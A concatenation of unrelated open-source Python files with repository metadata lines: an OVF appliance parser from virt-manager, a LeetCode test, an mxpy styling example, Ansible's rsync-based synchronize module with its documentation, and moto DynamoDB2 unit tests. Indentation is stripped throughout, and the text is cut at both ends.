for node in node_list(parent_node):
if node.name == child_name:
return node.content
return None
def convert_alloc_val(ignore, val):
# XXX: This is a hack, but should we really have to decode
# allocation units = "bytes * 2^20"?
val = float(val)
if val > 100000000:
# Assume bytes
return int(round(val / 1024.0 / 1024.0))
elif val > 100000:
# Assume kilobytes
return int(round(val / 1024.0))
elif val < 32:
# Assume GB
return int(val * 1024)
return int(val)
def _xml_wrapper(xml, func):
doc = None
ctx = None
result = None
try:
doc = libxml2.parseDoc(xml)
ctx = doc.xpathNewContext()
register_namespace(ctx)
result = func(ctx)
finally:
if doc:
doc.freeDoc()
if ctx:
ctx.xpathFreeContext()
return result
def get_xml_path(xml, path=None, func=None):
"""
Return the content from the passed xml xpath, or return the result
of a passed function (receives xpathContext as its only arg)
"""
def _get_xml_path(ctx):
result = None
if path:
ret = ctx.xpathEval(path)
if ret is not None:
if type(ret) == list:
if len(ret) >= 1:
# result = ret[0].content
result = ret
else:
result = ret
elif func:
result = func(ctx)
else:
raise ValueError(_("'path' or 'func' is required."))
return result
return _xml_wrapper(xml, _get_xml_path)
def _parse_hw_section(vm, nodes, file_refs, disk_section):
vm.nr_vcpus = 0
disk_buses = {}
for device_node in nodes:
if device_node.name != "Item":
continue
devtype = None
for item_node in node_list(device_node):
if item_node.name == "ResourceType":
devtype = item_node.content
if devtype == DEVICE_CPU:
cpus = get_child_content(device_node, "VirtualQuantity")
if cpus:
vm.nr_vcpus += int(cpus)
elif devtype == DEVICE_MEMORY:
mem = get_child_content(device_node, "VirtualQuantity")
alloc_str = get_child_content(device_node, "AllocationUnits")
if mem:
vm.memory = convert_alloc_val(alloc_str, mem)
elif devtype == DEVICE_ETHERNET:
net_model = get_child_content(device_node, "ResourceSubType")
if net_model:
net_model = net_model.lower()
netdev = netdevcfg.netdev(driver=net_model)
vm.netdevs[len(vm.netdevs)] = netdev
elif devtype == DEVICE_IDE_BUS:
instance_id = get_child_content(device_node, "InstanceID")
disk_buses[instance_id] = "ide"
elif devtype == DEVICE_SCSI_BUS:
instance_id = get_child_content(device_node, "InstanceID")
disk_buses[instance_id] = "scsi"
elif devtype in [DEVICE_DISK]:
bus_id = get_child_content(device_node, "Parent")
path = get_child_content(device_node, "HostResource")
dev_num = int(get_child_content(device_node, "AddressOnParent"))
if bus_id and bus_id not in disk_buses:
raise ValueError(_("Didn't find parent bus for disk '%s'" %
path))
bus = (bus_id and disk_buses[bus_id]) or "ide"
fmt = diskcfg.DISK_FORMAT_RAW
if path:
ref = None
fmt = diskcfg.DISK_FORMAT_VMDK
if path.startswith("ovf:/disk/"):
disk_ref = path[len("ovf:/disk/"):]
if disk_ref not in disk_section:
raise ValueError(_("Unknown reference id '%s' "
"for path %s.") % (path, ref))
ref, fmt = disk_section[disk_ref]
elif path.startswith("ovf:/file/"):
ref = path[len("ovf:/file/"):]
else:
raise ValueError(_("Unknown storage path type %s." % path))
if not ref:
# XXX: This means allocate the disk.
pass
if ref not in file_refs:
raise ValueError(_("Unknown reference id '%s' "
"for path %s.") % (path, ref))
path = file_refs[ref]
disk = diskcfg.disk(path=path, fmt=fmt, bus=bus,
typ=diskcfg.DISK_TYPE_DISK)
vm.disks[(bus, dev_num)] = disk
else:
desc = get_child_content(device_node, "Description")
logging.debug("Unhandled device type=%s desc=%s", devtype, desc)
class ovf_parser(formats.parser):
"""
Support for OVF appliance configurations.
Whitepaper: http://www.vmware.com/pdf/ovf_whitepaper_specification.pdf
Spec: http://www.dmtf.org/standards/published_documents/DSP0243_1.0.0.pdf
"""
name = "ovf"
suffix = ".ovf"
can_import = True
can_export = False
can_identify = True
@staticmethod
def identify_file(input_file):
"""
Return True if the given file is of this format.
"""
infile = open(input_file, "r")
xml = infile.read()
infile.close()
res = False
try:
if xml.count("</Envelope>"):
res = bool(get_xml_path(xml, "/ovf:Envelope"))
except Exception, e:
logging.debug("Error parsing OVF XML: %s", str(e))
return res
@staticmethod
def import_file(input_file):
"""
Import a configuration file. Raises if the file couldn't be
opened, or parsing otherwise failed.
"""
infile = open(input_file, "r")
xml = infile.read()
infile.close()
logging.debug("Importing OVF XML:\n%s", xml)
return _xml_wrapper(xml, ovf_parser._import_file)
@staticmethod
def _import_file(ctx):
def xpath_str(path):
ret = ctx.xpathEval(path)
result = None
if ret is not None:
if type(ret) == list:
if len(ret) >= 1:
result = ret[0].content
else:
result = ret
return result
def bool_val(val):
if str(val).lower() == "false":
return False
elif str(val).lower() == "true":
return True
return False
def xpath_nodes(path):
return ctx.xpathEval(path)
vm = vmcfg.vm()
file_refs = {}
disk_section = {}
net_section = {}
name = None
desc = None
os_id_ignore = None
os_ver_ignore = None
os_type_ignore = None
# XXX: Can have multiple machines nested as VirtualSystemCollection
# XXX: Need to check all Envelope
# General info
name = xpath_str("/ovf:Envelope/ovf:VirtualSystem/ovf:Name")
# Map files in <References> to actual filename
ens = xpath_nodes("/ovf:Envelope[1]")[0]
envelope_node = ens.children
for envelope_node in node_list(ens):
if envelope_node.name == "References":
for reference_node in envelope_node.children:
if reference_node.name != "File":
continue
file_id = reference_node.prop("id")
path = reference_node.prop("href")
# XXX: Should we validate the path exists? This can
# be http.
if file_id and path:
file_refs[file_id] = path
elif envelope_node.name == "DiskSection":
for disk_node in envelope_node.children:
if disk_node.name != "Disk":
continue
fmt = disk_node.prop("format")
if not fmt:
fmt = diskcfg.DISK_FORMAT_VMDK
elif fmt.lower().count("vmdk"):
fmt = diskcfg.DISK_FORMAT_VMDK
else:
fmt = diskcfg.DISK_FORMAT_VMDK
disk_id = disk_node.prop("diskId")
file_ref = disk_node.prop("fileRef")
capacity = disk_node.prop("capacity")
alloc_str = disk_node.prop("AllocationUnits")
capacity = convert_alloc_val(alloc_str, capacity)
# XXX: Empty fileref means 'create this disk'
disk_section[disk_id] = (file_ref, fmt)
elif envelope_node.name == "NetworkSection":
for net_node in envelope_node.children:
if net_node.name != "Network":
continue
net_name_ignore = net_node.prop("name")
net_section[name] = None
elif not envelope_node.isText():
logging.debug("Unhandled XML section '%s'",
envelope_node.name)
req = bool_val(envelope_node.prop("required"))
if req:
raise StandardError(_("OVF section '%s' is listed as "
"required, but parser doesn't know "
"how to handle it.") %
envelope_node.name)
# Now parse VirtualSystem, since we should have set up all the
# necessary file/disk/whatever refs
for envelope_node in node_list(ens):
if envelope_node.name != "VirtualSystem":
continue
for vs_node in node_list(envelope_node):
if vs_node.name == "Info":
pass
elif vs_node.name == "Name":
name = vs_node.content
elif vs_node.name == "OperatingSystemSection":
os_id_ignore = vs_node.prop("id")
os_ver_ignore = vs_node.prop("version")
# This is the VMWare OS name
os_type_ignore = vs_node.prop("osType")
elif vs_node.name == "VirtualHardwareSection":
_parse_hw_section(vm, node_list(vs_node), file_refs,
disk_section)
elif vs_node.name == "AnnotationSection":
for an_node in node_list(vs_node):
if an_node.name == "Annotation":
desc = an_node.content
vm.name = name
vm.description = desc
vm.validate()
return vm
@staticmethod
def export(vm):
"""
Export a configuration file as a string.
@vm vm configuration instance
Raises ValueError if configuration is not suitable.
"""
raise NotImplementedError
formats.register_parser(ovf_parser)
|
cardoe/virt-manager
|
virtconv/parsers/ovf.py
|
Python
|
gpl-2.0
| 13,949
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from solution import Solution
board = [['o','a','a','n'],
['e','t','a','e'],
['i','h','k','r'],
['i','f','l','v']]
words = ["oath","pea","eat","rain"]
sol = Solution()
res = sol.findWords(board, words)
print(res)
|
zhlinh/leetcode
|
0212.Word Search II/test.py
|
Python
|
apache-2.0
| 288
|
import clutter
import mxpy as mx
def create_button(parent, text, x, y):
button = mx.Button(text)
parent.add(button)
button.set_size(150, 100)
button.set_position(x, y)
return button
if __name__ == '__main__':
stage = clutter.Stage()
stage.connect('destroy', clutter.main_quit)
style = mx.style_get_default()
style.load_from_file('style/default.css')
button = create_button(stage, "Default Style", 100, 100)
button.set_name('default-button')
button = create_button(stage, "Red Style", 100, 300)
button.set_name('red-button')
button = create_button(stage, "Green Style", 350, 100)
button.set_name('green-button')
button = create_button(stage, "Blue Style", 350, 300)
button.set_name('blue-button')
table = mx.Table()
table.set_size(200, 80)
stage.add(table)
table.set_position(200, 215)
button = mx.Button("Container Test")
button.set_name('container-button')
table.add_actor(button, 0, 0)
stage.show()
clutter.main()
|
buztard/mxpy
|
examples/test-styles.py
|
Python
|
lgpl-2.1
| 1,030
|
SECONDS_IN_DAY = 86400
|
miti0/mosquito
|
core/constants.py
|
Python
|
gpl-3.0
| 24
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2012-2013, Timothy Appnel <tim@appnel.com>
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'core',
'version': '1.0'}
DOCUMENTATION = '''
---
module: synchronize
version_added: "1.4"
short_description: A wrapper around rsync to make common tasks in your playbooks quick and easy.
description:
- C(synchronize) is a wrapper around rsync to make common tasks in your playbooks quick and easy. It is run and originates on the local host where Ansible is being run. Of course, you could just use the C(command) action to call rsync yourself, but you also have to add a fair number of boilerplate options and host facts. C(synchronize) is not intended to provide access to the full power of rsync, but does make the most common invocations easier to implement. You `still` may need to call rsync directly via C(command) or C(shell) depending on your use case.
options:
src:
description:
- Path on the source host that will be synchronized to the destination; The path can be absolute or relative.
required: true
dest:
description:
- Path on the destination host that will be synchronized from the source; The path can be absolute or relative.
required: true
dest_port:
description:
- Port number for ssh on the destination host. Prior to ansible 2.0, the ansible_ssh_port inventory var took precedence over this value.
default: Value of ansible_ssh_port for this host, remote_port config setting, or the value from ssh client configuration if none of those are set
version_added: "1.5"
mode:
description:
- Specify the direction of the synchronization. In push mode the localhost or delegate is the source; In pull mode the remote host in context is the source.
required: false
choices: [ 'push', 'pull' ]
default: 'push'
archive:
description:
- Mirrors the rsync archive flag, enables recursive, links, perms, times, owner, group flags and -D.
choices: [ 'yes', 'no' ]
default: 'yes'
required: false
checksum:
description:
- Skip based on checksum, rather than mod-time & size; Note that that "archive" option is still enabled by default - the "checksum" option will not disable it.
choices: [ 'yes', 'no' ]
default: 'no'
required: false
version_added: "1.6"
compress:
description:
- Compress file data during the transfer. In most cases, leave this enabled unless it causes problems.
choices: [ 'yes', 'no' ]
default: 'yes'
required: false
version_added: "1.7"
existing_only:
description:
- Skip creating new files on receiver.
choices: [ 'yes', 'no' ]
default: 'no'
required: false
version_added: "1.5"
delete:
description:
- Delete files in C(dest) that don't exist (after transfer, not before) in the C(src) path. This option requires C(recursive=yes).
choices: [ 'yes', 'no' ]
default: 'no'
required: false
dirs:
description:
- Transfer directories without recursing
choices: [ 'yes', 'no' ]
default: 'no'
required: false
recursive:
description:
- Recurse into directories.
choices: [ 'yes', 'no' ]
default: the value of the archive option
required: false
links:
description:
- Copy symlinks as symlinks.
choices: [ 'yes', 'no' ]
default: the value of the archive option
required: false
copy_links:
description:
- Copy symlinks as the item that they point to (the referent) is copied, rather than the symlink.
choices: [ 'yes', 'no' ]
default: 'no'
required: false
perms:
description:
- Preserve permissions.
choices: [ 'yes', 'no' ]
default: the value of the archive option
required: false
times:
description:
- Preserve modification times
choices: [ 'yes', 'no' ]
default: the value of the archive option
required: false
owner:
description:
- Preserve owner (super user only)
choices: [ 'yes', 'no' ]
default: the value of the archive option
required: false
group:
description:
- Preserve group
choices: [ 'yes', 'no' ]
default: the value of the archive option
required: false
rsync_path:
description:
- Specify the rsync command to run on the remote host. See C(--rsync-path) on the rsync man page.
required: false
rsync_timeout:
description:
- Specify a --timeout for the rsync command in seconds.
default: 0
required: false
set_remote_user:
description:
- put user@ for the remote paths. If you have a custom ssh config to define the remote user for a host
that does not match the inventory user, you should set this parameter to "no".
default: yes
use_ssh_args:
description:
- Use the ssh_args specified in ansible.cfg
default: "no"
choices:
- "yes"
- "no"
version_added: "2.0"
rsync_opts:
description:
- Specify additional rsync options by passing in an array.
default:
required: false
version_added: "1.6"
partial:
description:
- Tells rsync to keep the partial file which should make a subsequent transfer of the rest of the file much faster.
default: no
required: false
version_added: "2.0"
verify_host:
description:
- Verify destination host key.
default: no
required: false
version_added: "2.0"
notes:
- rsync must be installed on both the local and remote host.
- For the C(synchronize) module, the "local host" is the host `the synchronize task originates on`, and the "destination host" is the host `synchronize is connecting to`.
- The "local host" can be changed to a different host by using `delegate_to`. This enables copying between two remote hosts or entirely on one remote machine.
- "The user and permissions for the synchronize `src` are those of the user running the Ansible task on the local host (or the remote_user for a delegate_to host when delegate_to is used)."
- The user and permissions for the synchronize `dest` are those of the `remote_user` on the destination host or the `become_user` if `become=yes` is active.
- In 2.0.0.0 a bug in the synchronize module made become occur on the "local host". This was fixed in 2.0.1.
- Expect that dest=~/x will be ~<remote_user>/x even if using sudo.
- Inspect the verbose output to validate the destination user/host/path
are what was expected.
- To exclude files and directories from being synchronized, you may add
C(.rsync-filter) files to the source directory.
- rsync daemon must be up and running with correct permission when using
rsync protocol in source or destination path.
- The C(synchronize) module forces `--delay-updates` to avoid leaving a destination in a broken in-between state if the underlying rsync process encounters an error. Those synchronizing large numbers of files that are willing to trade safety for performance should call rsync directly.
author: "Timothy Appnel (@tima)"
'''
EXAMPLES = '''
# Synchronization of src on the control machine to dest on the remote hosts
- synchronize:
src: some/relative/path
dest: /some/absolute/path
# Synchronization using rsync protocol (push)
- synchronize:
src: some/relative/path/
dest: rsync://somehost.com/path/
# Synchronization using rsync protocol (pull)
- synchronize:
mode: pull
src: rsync://somehost.com/path/
dest: /some/absolute/path/
# Synchronization using rsync protocol on delegate host (push)
- synchronize:
src: /some/absolute/path/
dest: rsync://somehost.com/path/
delegate_to: delegate.host
# Synchronization using rsync protocol on delegate host (pull)
- synchronize:
mode: pull
src: rsync://somehost.com/path/
dest: /some/absolute/path/
delegate_to: delegate.host
# Synchronization without any --archive options enabled
- synchronize:
src: some/relative/path
dest: /some/absolute/path
archive: no
# Synchronization with --archive options enabled except for --recursive
- synchronize:
src: some/relative/path
dest: /some/absolute/path
recursive: no
# Synchronization with --archive options enabled except for --times, with --checksum option enabled
- synchronize:
src: some/relative/path
dest: /some/absolute/path
checksum: yes
times: no
# Synchronization without --archive options enabled except use --links
- synchronize:
src: some/relative/path
dest: /some/absolute/path
archive: no
links: yes
# Synchronization of two paths both on the control machine
- synchronize:
src: some/relative/path
dest: /some/absolute/path
delegate_to: localhost
# Synchronization of src on the inventory host to the dest on the localhost in pull mode
- synchronize:
mode: pull
src: some/relative/path
dest: /some/absolute/path
# Synchronization of src on delegate host to dest on the current inventory host.
- synchronize:
src: /first/absolute/path
dest: /second/absolute/path
delegate_to: delegate.host
# Synchronize two directories on one remote host.
- synchronize:
src: /first/absolute/path
dest: /second/absolute/path
delegate_to: "{{ inventory_hostname }}"
# Synchronize and delete files in dest on the remote host that are not found in src of localhost.
- synchronize:
src: some/relative/path
dest: /some/absolute/path
delete: yes
recursive: yes
# Synchronize using an alternate rsync command
# This specific command is granted su privileges on the destination
- synchronize:
src: some/relative/path
dest: /some/absolute/path
rsync_path: "su -c rsync"
# Example .rsync-filter file in the source directory
# - var # exclude any path whose last part is 'var'
# - /var # exclude any path starting with 'var' starting at the source directory
# + /var/conf # include /var/conf even though it was previously excluded
# Synchronize passing in extra rsync options
- synchronize:
src: /tmp/helloworld
dest: /var/www/helloworld
rsync_opts:
- "--no-motd"
- "--exclude=.git"
'''
client_addr = None
def substitute_controller(path):
global client_addr
if not client_addr:
ssh_env_string = os.environ.get('SSH_CLIENT', None)
try:
client_addr, _ = ssh_env_string.split(None, 1)
except AttributeError:
ssh_env_string = os.environ.get('SSH_CONNECTION', None)
try:
client_addr, _ = ssh_env_string.split(None, 1)
except AttributeError:
pass
if not client_addr:
raise ValueError
if path.startswith('localhost:'):
path = path.replace('localhost', client_addr, 1)
return path
def main():
module = AnsibleModule(
argument_spec = dict(
src = dict(required=True),
dest = dict(required=True),
dest_port = dict(default=None, type='int'),
delete = dict(default='no', type='bool'),
private_key = dict(default=None),
rsync_path = dict(default=None),
_local_rsync_path = dict(default='rsync', type='path'),
_substitute_controller = dict(default='no', type='bool'),
archive = dict(default='yes', type='bool'),
checksum = dict(default='no', type='bool'),
compress = dict(default='yes', type='bool'),
existing_only = dict(default='no', type='bool'),
dirs = dict(default='no', type='bool'),
recursive = dict(type='bool'),
links = dict(type='bool'),
copy_links = dict(type='bool'),
perms = dict(type='bool'),
times = dict(type='bool'),
owner = dict(type='bool'),
group = dict(type='bool'),
set_remote_user = dict(default='yes', type='bool'),
rsync_timeout = dict(type='int', default=0),
rsync_opts = dict(type='list'),
ssh_args = dict(type='str'),
partial = dict(default='no', type='bool'),
verify_host = dict(default='no', type='bool'),
mode = dict(default='push', choices=['push', 'pull']),
),
supports_check_mode = True
)
if module.params['_substitute_controller']:
try:
source = '"' + substitute_controller(module.params['src']) + '"'
dest = '"' + substitute_controller(module.params['dest']) + '"'
except ValueError:
module.fail_json(msg='Could not determine controller hostname for rsync to send to')
else:
source = '"' + module.params['src'] + '"'
dest = '"' + module.params['dest'] + '"'
dest_port = module.params['dest_port']
delete = module.params['delete']
private_key = module.params['private_key']
rsync_path = module.params['rsync_path']
rsync = module.params.get('_local_rsync_path', 'rsync')
rsync_timeout = module.params.get('rsync_timeout', 'rsync_timeout')
archive = module.params['archive']
checksum = module.params['checksum']
compress = module.params['compress']
existing_only = module.params['existing_only']
dirs = module.params['dirs']
partial = module.params['partial']
# the default of these params depends on the value of archive
recursive = module.params['recursive']
links = module.params['links']
copy_links = module.params['copy_links']
perms = module.params['perms']
times = module.params['times']
owner = module.params['owner']
group = module.params['group']
rsync_opts = module.params['rsync_opts']
ssh_args = module.params['ssh_args']
verify_host = module.params['verify_host']
if '/' not in rsync:
rsync = module.get_bin_path(rsync, required=True)
ssh = module.get_bin_path('ssh', required=True)
cmd = '%s --delay-updates -F' % rsync
if compress:
cmd = cmd + ' --compress'
if rsync_timeout:
cmd = cmd + ' --timeout=%s' % rsync_timeout
if module.check_mode:
cmd = cmd + ' --dry-run'
if delete:
cmd = cmd + ' --delete-after'
if existing_only:
cmd = cmd + ' --existing'
if checksum:
cmd = cmd + ' --checksum'
if archive:
cmd = cmd + ' --archive'
if recursive is False:
cmd = cmd + ' --no-recursive'
if links is False:
cmd = cmd + ' --no-links'
if copy_links is True:
cmd = cmd + ' --copy-links'
if perms is False:
cmd = cmd + ' --no-perms'
if times is False:
cmd = cmd + ' --no-times'
if owner is False:
cmd = cmd + ' --no-owner'
if group is False:
cmd = cmd + ' --no-group'
else:
if recursive is True:
cmd = cmd + ' --recursive'
if links is True:
cmd = cmd + ' --links'
if copy_links is True:
cmd = cmd + ' --copy-links'
if perms is True:
cmd = cmd + ' --perms'
if times is True:
cmd = cmd + ' --times'
if owner is True:
cmd = cmd + ' --owner'
if group is True:
cmd = cmd + ' --group'
if dirs:
cmd = cmd + ' --dirs'
if private_key is None:
private_key = ''
else:
private_key = '-i "%s"' % private_key
ssh_opts = '-S none'
if not verify_host:
ssh_opts = '%s -o StrictHostKeyChecking=no' % ssh_opts
if ssh_args:
ssh_opts = '%s %s' % (ssh_opts, ssh_args)
if source.startswith('"rsync://') and dest.startswith('"rsync://'):
module.fail_json(msg='either src or dest must be a localhost', rc=1)
if not source.startswith('"rsync://') and not dest.startswith('"rsync://'):
# If the user specified a port value
# Note: The action plugin takes care of setting this to a port from
# inventory if the user didn't specify an explicit dest_port
if dest_port is not None:
cmd += " --rsh 'ssh %s %s -o Port=%s'" % (private_key, ssh_opts, dest_port)
else:
cmd += " --rsh 'ssh %s %s'" % (private_key, ssh_opts)
if rsync_path:
cmd = cmd + " --rsync-path=%s" % (rsync_path)
if rsync_opts:
cmd = cmd + " " + " ".join(rsync_opts)
if partial:
cmd = cmd + " --partial"
changed_marker = '<<CHANGED>>'
cmd = cmd + " --out-format='" + changed_marker + "%i %n%L'"
# expand the paths
if '@' not in source:
source = os.path.expanduser(source)
if '@' not in dest:
dest = os.path.expanduser(dest)
cmd = ' '.join([cmd, source, dest])
cmdstr = cmd
(rc, out, err) = module.run_command(cmd)
if rc:
return module.fail_json(msg=err, rc=rc, cmd=cmdstr)
else:
changed = changed_marker in out
out_clean=out.replace(changed_marker,'')
out_lines=out_clean.split('\n')
while '' in out_lines:
out_lines.remove('')
if module._diff:
diff = {'prepared': out_clean}
return module.exit_json(changed=changed, msg=out_clean,
rc=rc, cmd=cmdstr, stdout_lines=out_lines,
diff=diff)
else:
return module.exit_json(changed=changed, msg=out_clean,
rc=rc, cmd=cmdstr, stdout_lines=out_lines)
# import module snippets
from ansible.module_utils.basic import *
if __name__ == '__main__':
main()
|
grimmjow8/ansible
|
lib/ansible/modules/files/synchronize.py
|
Python
|
gpl-3.0
| 18,198
|
from __future__ import unicode_literals
import boto
import boto3
from boto3.dynamodb.conditions import Key
import sure # noqa
from freezegun import freeze_time
from boto.exception import JSONResponseError
from moto import mock_dynamodb2
from tests.helpers import requires_boto_gte
try:
from boto.dynamodb2.fields import HashKey
from boto.dynamodb2.table import Table
from boto.dynamodb2.table import Item
from boto.dynamodb2.exceptions import ConditionalCheckFailedException, ItemNotFound
except ImportError:
pass
def create_table():
table = Table.create('messages', schema=[
HashKey('forum_name')
], throughput={
'read': 10,
'write': 10,
})
return table
@requires_boto_gte("2.9")
@mock_dynamodb2
@freeze_time("2012-01-14")
def test_create_table():
create_table()
expected = {
'Table': {
'AttributeDefinitions': [
{'AttributeName': 'forum_name', 'AttributeType': 'S'}
],
'ProvisionedThroughput': {
'NumberOfDecreasesToday': 0, 'WriteCapacityUnits': 10, 'ReadCapacityUnits': 10
},
'TableSizeBytes': 0,
'TableName': 'messages',
'TableStatus': 'ACTIVE',
'KeySchema': [
{'KeyType': 'HASH', 'AttributeName': 'forum_name'}
],
'ItemCount': 0, 'CreationDateTime': 1326499200.0,
'GlobalSecondaryIndexes': [],
}
}
conn = boto.dynamodb2.connect_to_region(
'us-west-2',
aws_access_key_id="ak",
aws_secret_access_key="sk"
)
conn.describe_table('messages').should.equal(expected)
@requires_boto_gte("2.9")
@mock_dynamodb2
def test_delete_table():
create_table()
conn = boto.dynamodb2.layer1.DynamoDBConnection()
conn.list_tables()["TableNames"].should.have.length_of(1)
conn.delete_table('messages')
conn.list_tables()["TableNames"].should.have.length_of(0)
conn.delete_table.when.called_with('messages').should.throw(JSONResponseError)
@requires_boto_gte("2.9")
@mock_dynamodb2
def test_update_table_throughput():
table = create_table()
table.throughput["read"].should.equal(10)
table.throughput["write"].should.equal(10)
table.update(throughput={
'read': 5,
'write': 6,
})
table.throughput["read"].should.equal(5)
table.throughput["write"].should.equal(6)
@requires_boto_gte("2.9")
@mock_dynamodb2
def test_item_add_and_describe_and_update():
table = create_table()
data = {
'forum_name': 'LOLCat Forum',
'Body': 'http://url_to_lolcat.gif',
'SentBy': 'User A',
}
table.put_item(data=data)
returned_item = table.get_item(forum_name="LOLCat Forum")
returned_item.should_not.be.none
dict(returned_item).should.equal({
'forum_name': 'LOLCat Forum',
'Body': 'http://url_to_lolcat.gif',
'SentBy': 'User A',
})
returned_item['SentBy'] = 'User B'
returned_item.save(overwrite=True)
returned_item = table.get_item(
forum_name='LOLCat Forum'
)
dict(returned_item).should.equal({
'forum_name': 'LOLCat Forum',
'Body': 'http://url_to_lolcat.gif',
'SentBy': 'User B',
})
@requires_boto_gte("2.9")
@mock_dynamodb2
def test_item_put_without_table():
conn = boto.dynamodb2.layer1.DynamoDBConnection()
conn.put_item.when.called_with(
table_name='undeclared-table',
item={
'forum_name': 'LOLCat Forum',
'Body': 'http://url_to_lolcat.gif',
'SentBy': 'User A',
}
).should.throw(JSONResponseError)
@requires_boto_gte("2.9")
@mock_dynamodb2
def test_get_item_with_undeclared_table():
conn = boto.dynamodb2.layer1.DynamoDBConnection()
conn.get_item.when.called_with(
table_name='undeclared-table',
key={"forum_name": {"S": "LOLCat Forum"}},
).should.throw(JSONResponseError)
@requires_boto_gte("2.30.0")
@mock_dynamodb2
def test_delete_item():
table = create_table()
item_data = {
'forum_name': 'LOLCat Forum',
'Body': 'http://url_to_lolcat.gif',
'SentBy': 'User A',
'ReceivedTime': '12/9/2011 11:36:03 PM',
}
item = Item(table, item_data)
item.save()
table.count().should.equal(1)
response = item.delete()
response.should.equal(True)
table.count().should.equal(0)
item.delete().should.equal(False)
@requires_boto_gte("2.9")
@mock_dynamodb2
def test_delete_item_with_undeclared_table():
conn = boto.dynamodb2.layer1.DynamoDBConnection()
conn.delete_item.when.called_with(
table_name='undeclared-table',
key={"forum_name": {"S": "LOLCat Forum"}},
).should.throw(JSONResponseError)
@requires_boto_gte("2.9")
@mock_dynamodb2
def test_query():
table = create_table()
item_data = {
'forum_name': 'the-key',
'Body': 'http://url_to_lolcat.gif',
'SentBy': 'User A',
'ReceivedTime': '12/9/2011 11:36:03 PM',
}
item = Item(table, item_data)
item.save(overwrite=True)
table.count().should.equal(1)
table = Table("messages")
results = table.query(forum_name__eq='the-key')
sum(1 for _ in results).should.equal(1)
@requires_boto_gte("2.9")
@mock_dynamodb2
def test_query_with_undeclared_table():
conn = boto.dynamodb2.layer1.DynamoDBConnection()
conn.query.when.called_with(
table_name='undeclared-table',
key_conditions={"forum_name": {"ComparisonOperator": "EQ", "AttributeValueList": [{"S": "the-key"}]}}
).should.throw(JSONResponseError)
@requires_boto_gte("2.9")
@mock_dynamodb2
def test_scan():
table = create_table()
item_data = {
'Body': 'http://url_to_lolcat.gif',
'SentBy': 'User A',
'ReceivedTime': '12/9/2011 11:36:03 PM',
}
item_data['forum_name'] = 'the-key'
item = Item(table, item_data)
item.save()
item['forum_name'] = 'the-key2'
item.save(overwrite=True)
item_data = {
'Body': 'http://url_to_lolcat.gif',
'SentBy': 'User B',
'ReceivedTime': '12/9/2011 11:36:03 PM',
'Ids': set([1, 2, 3]),
'PK': 7,
}
item_data['forum_name'] = 'the-key3'
item = Item(table, item_data)
item.save()
results = table.scan()
sum(1 for _ in results).should.equal(3)
results = table.scan(SentBy__eq='User B')
sum(1 for _ in results).should.equal(1)
results = table.scan(Body__beginswith='http')
sum(1 for _ in results).should.equal(3)
results = table.scan(Ids__null=False)
sum(1 for _ in results).should.equal(1)
results = table.scan(Ids__null=True)
sum(1 for _ in results).should.equal(2)
results = table.scan(PK__between=[8, 9])
sum(1 for _ in results).should.equal(0)
results = table.scan(PK__between=[5, 8])
sum(1 for _ in results).should.equal(1)
@requires_boto_gte("2.9")
@mock_dynamodb2
def test_scan_with_undeclared_table():
conn = boto.dynamodb2.layer1.DynamoDBConnection()
conn.scan.when.called_with(
table_name='undeclared-table',
scan_filter={
"SentBy": {
"AttributeValueList": [{
"S": "User B"}
],
"ComparisonOperator": "EQ"
}
},
).should.throw(JSONResponseError)
@requires_boto_gte("2.9")
@mock_dynamodb2
def test_write_batch():
table = create_table()
with table.batch_write() as batch:
batch.put_item(data={
'forum_name': 'the-key',
'subject': '123',
'Body': 'http://url_to_lolcat.gif',
'SentBy': 'User A',
'ReceivedTime': '12/9/2011 11:36:03 PM',
})
batch.put_item(data={
'forum_name': 'the-key2',
'subject': '789',
'Body': 'http://url_to_lolcat.gif',
'SentBy': 'User B',
'ReceivedTime': '12/9/2011 11:36:03 PM',
})
table.count().should.equal(2)
with table.batch_write() as batch:
batch.delete_item(
forum_name='the-key',
subject='789'
)
table.count().should.equal(1)
@requires_boto_gte("2.9")
@mock_dynamodb2
def test_batch_read():
table = create_table()
item_data = {
'Body': 'http://url_to_lolcat.gif',
'SentBy': 'User A',
'ReceivedTime': '12/9/2011 11:36:03 PM',
}
item_data['forum_name'] = 'the-key1'
item = Item(table, item_data)
item.save()
item = Item(table, item_data)
item_data['forum_name'] = 'the-key2'
item.save(overwrite=True)
item_data = {
'Body': 'http://url_to_lolcat.gif',
'SentBy': 'User B',
'ReceivedTime': '12/9/2011 11:36:03 PM',
'Ids': set([1, 2, 3]),
'PK': 7,
}
item = Item(table, item_data)
item_data['forum_name'] = 'another-key'
item.save(overwrite=True)
results = table.batch_get(
keys=[
{'forum_name': 'the-key1'},
{'forum_name': 'another-key'},
]
)
# Iterate through so that batch_item gets called
count = len([x for x in results])
count.should.equal(2)
@requires_boto_gte("2.9")
@mock_dynamodb2
def test_get_key_fields():
table = create_table()
kf = table.get_key_fields()
kf[0].should.equal('forum_name')
@requires_boto_gte("2.9")
@mock_dynamodb2
def test_get_missing_item():
table = create_table()
table.get_item.when.called_with(forum_name='missing').should.throw(ItemNotFound)
@requires_boto_gte("2.9")
@mock_dynamodb2
def test_get_special_item():
table = Table.create('messages', schema=[
HashKey('date-joined')
], throughput={
'read': 10,
'write': 10,
})
data = {
'date-joined': 127549192,
'SentBy': 'User A',
}
table.put_item(data=data)
returned_item = table.get_item(**{'date-joined': 127549192})
dict(returned_item).should.equal(data)
@mock_dynamodb2
def test_update_item_remove():
conn = boto.dynamodb2.connect_to_region("us-west-2")
table = Table.create('messages', schema=[
HashKey('username')
])
data = {
'username': "steve",
'SentBy': 'User A',
'SentTo': 'User B',
}
table.put_item(data=data)
key_map = {
"S": "steve"
}
# Then remove the SentBy field
conn.update_item("messages", key_map, update_expression="REMOVE :SentBy, :SentTo")
returned_item = table.get_item(username="steve")
dict(returned_item).should.equal({
'username': "steve",
})
@mock_dynamodb2
def test_update_item_set():
conn = boto.dynamodb2.connect_to_region("us-west-2")
table = Table.create('messages', schema=[
HashKey('username')
])
data = {
'username': "steve",
